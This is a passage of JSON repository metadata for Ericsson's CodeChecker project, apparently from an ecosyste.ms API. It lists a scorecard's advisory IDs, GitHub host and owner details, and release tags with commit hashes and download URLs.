GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-cchq-frgv-rjh5","Warn: Project is vulnerable to: GHSA-g644-9gfx-q4q4","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-14T22:53:38.249Z","repository_id":37431651,"created_at":"2025-08-14T22:53:38.249Z","updated_at":"2025-08-14T22:53:38.249Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271198843,"owners_count":24717130,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Ericsson","name":"Ericsson","uuid":"4161311","kind":"organization","description":"Home for Ericsson's Open Source software","email":"opensource@ericsson.com","website":"http://www.ericsson.com","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/4161311?v=4","repositories_count":119,"last_synced_at":"2024-04-15T22:07:40.334Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/Ericsson","funding_links":[],"total_stars":4306,"followers":165,"following":0,"created_at":"2022-11-05T10:49:44.232Z","updated_at":"2024-04-15T22:07:56.651Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson/repositories"},"tags":[{"name":"v6.26.1","sha":"b7810134193a48f9ec33da861b1e308f7ed553b8","kind":"commit","published_at":"2025-07-10T17:42:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1/manifests"},{"name":"v6.26.0","sha":"0bbf351e870c7056cd9cc0dc44a795c0fe805dfa","kind":"commit","published_at":"2025-06-06T23:31:28.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0/manifests"},{"name":"v6.26.0-rc1","sha":"e0b9374245f88450d5b6dc4b164f78d9e2f06cfb","kind":"commit","published_at":"2025-04-28T09:21:09.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1/manifests"},{"name":"v6.25.1","sha":"c63dcdd8aa8dbd47360a0a02234c94e45107fb76","kind":"commit","published_at":"2025-03-12T13:44:01.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1/manifests"},{"name":"v6.25.0","sha":"d1ca304f33f4852275a612c05fc9fa102e34dcaa","kind":"commit","published_at":"2025-03-05T08:55:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0/manifests"},{"name":"v6.24.7","sha":"71f343577e0eea089e53b3bd78dfcb8867403cf3","kind":"commit","published_at":"2025-02-18T10:30:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7/manifests"},{"name":"v6.24.6","sha":"4ce6544bb734faa69fc00023b1477f416541933a","kind":"commit","published_at":"2025-02-17T15:00:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6/manifests"},{"name":"v6.24.5","sha":"5914f3a98336823c3a0a1061d84832ed88822469","kind":"commit","published_at":"2025-01-21T14:55:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5/manifests"},{"name":"v6.25.0-rc1","sha":"920d71089ac661d07670c8b9d5c2dd2cebcafcbd","kind":"commit","published_at":"2024-12-11T08:48:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1/manifests"},{"name":"v6.24.4","sha":"454d978191ed42c8202a2244dc092dfb6fd8c83a","kind":"commit","published_at":"2024-10-25T10:41:35.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4/manifests"},{"name":"v6.24.3","sha":"42074b5e3e3e8c166364b6a618b3795de60c6bbf","kind":"commit","published_at":"2024-10-18T13:35:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3/manifests"},{"name":"v6.24.2","sha":"ad41702e3108e4b92ae5d0143a5b961cc34195eb","kind":"commit","published_at":"2024-10-18T10:18:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2/manifests"},{"name":"v6.24.1","sha":"2cc6285dfd32b786e92239d4038dcdea3abfb63b","kind":"commit","published_at":"2024-09-13T09:33:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1/manifests"},{"name":"v6.24.0","sha":"ea795071d62637c69300f4528b6c46c75b2274bc","kind":"commit","published_at":"2024-06-12T12:29:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0/manifests"},{"name":"v6.24.0-rc1","sha":"f05a9bf97759b133f0729aaf12232c54b46b7c19","kind":"commit","published_at":"2024-04-18T06:33:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1/manifests"},{"name":"v6.23.1","sha":"2a8fa6e711a4ff591280a79fe8798dee2507d984","kind":"commit","published_at":"2023-12-14T14:30:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1/manifests"},{"name":"v6.23.0","sha":"bea15d4fb77478860dee41f6e7f206050720869a","kind":"commit","published_at":"2023-12-08T18:46:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0/manifests"},{"name":"v6.23.0-rc2","sha":"605ba1b9db6ed067c89a12f7055cc177b76f8ed6","kind":"commit","published_at":"2023-11-17T11:24:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2/manifests"},{"name":"v6.23.0-rc1","sha":"848e335ff33e49db1905331424c268d423feb7fc","kind":"commit","published_at":"2023-10-30T14:42:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1/manifests"},{"name":"v6.22.2","sha":"a3d35cfd509b995187288cd8631446415a334257","kind":"commit","published_at":"2023-07-13T14:47:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2/manifests"},{"name":"v6.22.1","sha":"8aabb4f715ed971f5ff9751b438e2ac00016e145","kind":"commit","published_at":"2023-04-19T13:23:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1/manifests"},{"name":"v6.22.0","sha":"ecf377637b86360c75508952b2e43fabac2aec6b","kind":"commit","published_at":"2023-04-14T13:22:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0/manifests"},{"name":"v6.22.0-rc1","sha":"6fc70f69b75ccbe46f537cc817b0cf07ba9c8cd9","kind":"commit","published_at":"2023-03-24T14:34:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1/manifests"},{"name":"v6.21.0","sha":"fe0ac5b291ed3cfef8fd8c6909501de55dabc20e","kind":"commit","published_at":"2022-11-09T17:22:05.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0/manifests"},{"name":"v6.20.0-hotfix5","sha":"e70c682f11af655d6b174a15d596ed913f1cb924","kind":"commit","published_at":"2022-11-04T13:36:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5/manifests"},{"name":"v6.20.0-hotfix4","sha":"cbefae31ba2a4b66944af401da05e85b858a290a","kind":"commit","published_at":"2022-11-03T17:44:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4/manifests"},{"name":"v6.21.0-rc1","sha":"b629fb04a7f05dbbc74aff0616add06ef9b26dd1","kind":"commit","published_at":"2022-10-27T09:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1/manifests"},{"name":"v6.20.0-hotfix3","sha":"49a50a849df44881e7709cb26f7daa2380139359","kind":"commit","published_at":"2022-09-26T17:11:33.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3/manifests"},{"name":"v6.20.0-hotfix2","sha":"b518f9af122c36fc9896a2f1fafe417395e2e82e","kind":"commit","published_at":"2022-09-21T18:46:30.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2/manifests"},{"name":"v6.20.0-hotfix1","sha":"0297574b742ab8186665c3a5d2917fa89245b59f","kind":"commit","published_at":"2022-09-19T17:24:52.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1/manifests"},{"name":"v6.20.0","sha":"7d65d89c2a3fed84f395016d4c9815bab860d0b3","kind":"commit","published_at":"2022-09-15T11:44:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0/manifests"},{"name":"v6.20.0-rc1","sha":"d24c22cd39a9e7a9145c5293843c6450e31862db","kind":"commit","published_at":"2022-08-22T21:27:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1/manifests"},{"name":"v6.19.1-hotfix2","sha":"c0af8d9a42f75f28ccfdc149194e5cc95be14841","kind":"commit","published_at":"2022-07-21T15:16:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2/manifests"},{"name":"v6.19.1-hotfix1","sha":"d564db65a58fc7ef651ab1474a72eadf4c29c55f","kind":"commit","published_at":"2022-07-06T13:28:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1/manifests"},{"name":"v6.19.1","sha":"9fa0f9817f6e91eda2a9202e0a3bf5006accdc8c","kind":"commit","published_at":"2022-03-18T15:09:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1/manifests"},{"name":"v6.19.0-hotfix1","sha":"e262d015068c6b49f92a2afb1a166eb4f4438e84","kind":"commit","published_at":"2022-03-12T13:05:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1/manifests"},{"name":"v6.19.0","sha":"5f5b6b7e7ecd70d23079580c063f4e4f2bb2a7ad","kind":"commit","published_at":"2022-03-10T13:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0/manifests"},{"name":"v6.18.2-hotfix1","sha":"359e88b9339946cba84c00ad32511be8b7fad65d","kind":"commit","published_at":"2022-02-03T09:31:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1/manifests"},{"name":"v6.18.2","sha":"992d274c78b9a0436328c30a40d3b1de899902e2","kind":"commit","published_at":"2022-01-14T14:04:31.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2/manifests"},{"name":"v6.18.1","sha":"fd5f7e04219f947cfda68e9e11f4d3b07f0564a5","kind":"commit","published_at":"2021-12-10T07:28:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1/manifests"},{"name":"v6.18.0-hotfix1","sha":"a46603ab87348ff5e9bf5016fd906e9ef6781eb4","kind":"commit","published_at":"2021-11-18T17:46:56.000